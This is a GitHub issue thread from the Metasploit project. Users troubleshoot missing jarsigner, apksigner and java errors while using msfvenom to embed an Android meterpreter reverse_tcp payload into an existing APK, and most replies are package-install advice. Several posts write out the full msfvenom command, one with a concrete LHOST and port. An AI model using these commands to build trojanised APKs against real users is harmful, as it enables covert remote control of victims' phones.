### ISSUE TITLE
bug to using apk template

### ISSUE THREAD

**Issue by Cyphor00** [rapid7/metasploit-framework#9165]
hi
I also have this item in this section
I'm having this problem:
msfvenom -x '/root/Desktop/Alireza.apk' -p android/meterpreter/reverse_tcp LHOST=my ip LPORT=4444 -o Ali.apk
Using APK template: /root/Desktop/Alireza.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
Error: jarsigner not found. If it's not in your PATH, please add it.
what should I do?

`/metasploit/msfvnom/jarsigner/template`

**Comment by timwr** [comment]
Which OS are you on?
https://www.digitalocean.com/community/tutorials/how-to-install-java-with-apt-get-on-ubuntu-16-04
You'll need get jarsigner working in your path.

**Comment by Cyphor00** [comment]
look
![capture](https://user-images.githubusercontent.com/30301706/32325472-6398a5bc-bfe4-11e7-8003-b87d0ff48997.PNG)

I don't know what to install

**Comment by backtoback1** [comment]
apt install zipalign

**Comment by Cyphor00** [comment]
Did not make a difference
Again the same error

**Comment by backtoback1** [comment]
Do you have java installed on your system?

**Comment by timwr** [comment]
@Cyphor00 it's best to join our IRC channel for support.
You need to install jarsigner and it to your path. You can check google for how to do that (it depends on which OS you're on).
I've provided a link above that will help you. `apt install default-jre`?.
I'm not sure why it's not longer included in kali (I thought it used to be?).

**Comment by DineshLJ** [comment]
Facing same issue in Windows 10. Kindly help.

**Comment by Rev3rs3** [comment]
Facing same issue in windows 10. Kindly help

**Comment by Dukdog** [comment]
hmmm

**Comment by bcoles** [comment]
> hmmm

This issue is 5 years old. `jarsigner` is no longer required. `apksigner` is now used instead.

**Comment by Dukdog** [comment]
@bcoles 
u see i got new problem too. 
Error: apksigner not found. If it's not in your PATH, please add it.
its been a while i not using apktool, but when i try to install it and then embed a apk using msfvenom and apktool i found a an unfamiliar problem

**Comment by Dukdog** [comment]
@bcoles if u know the solution...

**Comment by bcoles** [comment]
> @bcoles u see i got new problem too. Error: apksigner not found. If it's not in your PATH, please add it. its been a while i not using apktool, but when i try to install it and then embed a apk using msfvenom and apktool i found a an unfamiliar problem

`apksigner` and `apktool` are different tools. Install Android `apksigner` and ensure it is in your system `PATH`.

```
sudo apt-get install apksigner
```

**Comment by diwas7777** [comment]
It says **E: Unable to locate package apksigner**
Anyone help me

**Comment by diwas7777** [comment]
I got my problem fixed.

**Comment by diwas7777** [comment]
If anyone is still having issue in latest kali linux use this:

**sudo apt-get update**

After updating

**sudo apt-get -y install apksigner**

and it worked for me 

also for zipalign use this

**sudo apt-get -y install zipalign**

Thanks me later☺️☺️

**Comment by MarcoLopes389** [comment]
Hello, I have an similar problem: 
msfvenom -x base.apk -p android/meterpreter/reverse_tcp LHOST=192.168.1.14 LPORT=4444 -o output.apk
Using APK template: base.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: java not found. If it's not in your PATH, please add it.

But I have java, apktool and apksigner installed. The android-sdk is installed too. What I can do is this case?

**Comment by bcoles** [comment]
> Error: java not found. If it's not in your PATH, please add it.
> But I have java, apktool and apksigner installed. The android-sdk is installed too. What I can do is this case?

Ensure your `PATH` environment variable includes the path to `java`.

**Comment by chocolaid** [comment]
solutions for windows

**Comment by amir-m-goudarzi** [comment]
I'm using arch what should i do?
